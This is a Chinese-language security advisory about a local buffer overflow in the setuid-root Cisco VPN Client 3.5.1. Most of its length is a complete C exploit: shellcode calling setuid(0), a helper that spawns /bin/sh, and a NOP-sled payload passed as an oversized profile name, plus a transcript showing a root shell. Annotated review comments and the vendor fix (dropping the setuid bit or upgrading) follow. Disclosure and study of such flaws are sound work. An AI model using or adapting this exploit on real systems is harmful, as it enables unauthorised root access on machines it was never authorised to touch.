Cisco VPN Client for Unix存在本地缓冲溢出发布时间:2002-06-22 更新时间:2002-06-22 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:5056 受影响系统 Cisco VPN Client 3.5.1 for Solaris详细描述 Cisco VPN客户端软件用于连接CISCO VPN网络。 其中Cisco VPN客户端存在漏洞,如果超长的profile名称传递给Cisco VPN客户端,就可以导致缓冲溢出,由于Cisco VPN客户端以SUID ROOT权限运行,利用此漏洞可以获得ROOT权限。 测试代码
/* buffer overflow for cisco's vpnclient for linux
 *
 * tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz
 *
 * to get this to properly work, you need to put the following code into xx.c,
 * compile it (as xx), and place the executable into /tmp (to bypass tight PAM
 * restrictions)
 *
 *   #include <stdio.h>
 *   main() { setuid(0); execl("/bin/sh", "sh", NULL); }
 *
 * then compile this and run it. syntax is ./vpnclient <offset>
 *
 * tested under gentoo linux and debian:
 *
 *   $ ls -la `which vpnclient`
 *   -rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
 *   $ ./vpnKILLient
 *   addr: 0xbffffbac, offset: 0
 *   Cisco Systems VPN Client Version 3.5.1 (Rel)
 *   Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
 *   Client Type(s): Linux
 *   Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686
 *   sh-2.05a# id
 *   uid=0(root) gid=100(users) groups=100(users),10(wheel)
 *
 * greetz: all of the angrypacket crew (of course)
 *   shok -> pheerable^2; vegac -> 31336++;
 * when you get a chance, check out http://sec.angrypacket.com
 *
 * NOTE(review): root cause per the advisory is an unbounded copy of the
 * profile-name argument inside a setuid-root binary. The advisory's own
 * mitigations are to drop the setuid bit (chmod 755 on the binary) or to
 * upgrade to 3.5.2. The technique below (NOP sled + guessed stack address)
 * also presumes an executable stack and predictable stack addresses, which
 * non-executable-stack and ASLR defaults on current systems remove.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* NOTE(review): atoi(), malloc() and bzero() are used below without
 * <stdlib.h> / <strings.h>; this relied on implicit function declarations,
 * which C99 removed. */

#define NOP 0x90
#define LEN 620 /* 520 to own eip */

/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x78\x78"
"\x68\x2f\x74\x6d\x70\x89\xe3\x31"
"\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
"\x0b\xcd\x80\x00";

/* Reads the current stack pointer; main() uses it as the base for the
 * address it writes into the payload.
 * NOTE(review): there is no return statement. The value only comes back
 * because the inline asm leaves it in %eax, the i386 return register; this is
 * undefined behaviour in standard C and i386-only. */
unsigned long get_sp (void) { __asm__("mov %esp,%eax"); }

/* Builds an oversized profile-name argument and hands it to the setuid
 * vpnclient binary via execl().
 *
 * argv[1] (optional): decimal offset subtracted from get_sp() to adjust the
 *                     guessed address; defaults to 0.
 * Returns 0 only if execl() fails (on success the process image is replaced). */
int main(int argc, char *argv[])
{
    int i, offset=0;
    long addr;
    char *buf, *ptr;

    if(argc > 1) offset = atoi(argv[1]);

    /* LEN bytes, zero-filled; the final byte is set to '\0' below so the
     * argument is a proper C string. */
    buf = (char *)malloc(sizeof(char) * LEN);
    bzero(buf, LEN);

    addr = get_sp() - offset;
    /* NOTE(review): %x with a long argument only matches on ILP32 targets. */
    printf("addr: 0x%x, offset: %d\n", addr, offset);

    /* Fill the whole buffer with the guessed address, 4 bytes at a time. */
    for(i = 0; i < LEN; i += 4) {
        *(long *)&buf[i] = addr;
    }

    /* Overwrite the first half with NOPs. */
    for(i = 0; i < (LEN / 2); i++) {
        *(buf + i) = NOP;
    }

    /* Place the shellcode centred on the buffer's midpoint. */
    ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
    for(i = 0; i < strlen(shell); i++) {
        *(ptr++) = shell[i];
    }

    buf[LEN - 1] = '\0';

    /* NOTE(review): the argv terminator is the int 0 rather than (char *)NULL;
     * it happens to work where int and pointer have the same size. */
    execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);

    return(0);
}
解决方案 /bin/chmod 755 /usr/local/bin/vpnclient 或者使用3.5.2版本: http://www.cisco.com/public/sw-center/ 相关信息 methodic <methodic@bigunz.angrypacket.com> 参考:http://online.securityfocus.com/advisories/4214 http://online.securityfocus.com/archive/1/277653 相关主页:http://www.cisco.com/public/sw-center/ |